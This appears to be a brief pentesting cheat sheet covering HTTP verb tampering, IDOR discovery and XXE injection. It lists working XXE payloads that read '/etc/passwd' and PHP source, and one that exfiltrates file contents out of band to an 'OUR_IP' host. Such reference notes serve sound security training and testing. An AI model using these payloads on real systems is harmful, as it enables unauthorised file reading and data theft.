Web Attacks

HTTP Verb Tampering

HTTP Method

  • HEAD

  • PUT

  • DELETE

  • OPTIONS

  • PATCH

Command

Description

-X OPTIONS

Set HTTP Method with Curl

IDOR

Identify IDORS

  • In URL parameters & APIs

  • In AJAX Calls

  • By understanding reference hashing/encoding

  • By comparing user roles

Command

Description

md5sum

MD5 hash a string

base64

Base64 encode a string

XXE

Code

Description

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">

Define External Entity to a URL

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Define External Entity to a file path

<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Read PHP source code with base64 encode filter

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Reading a file through a PHP error

<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Reading a file OOB exfiltration

PreviousCommand Injection

Last updated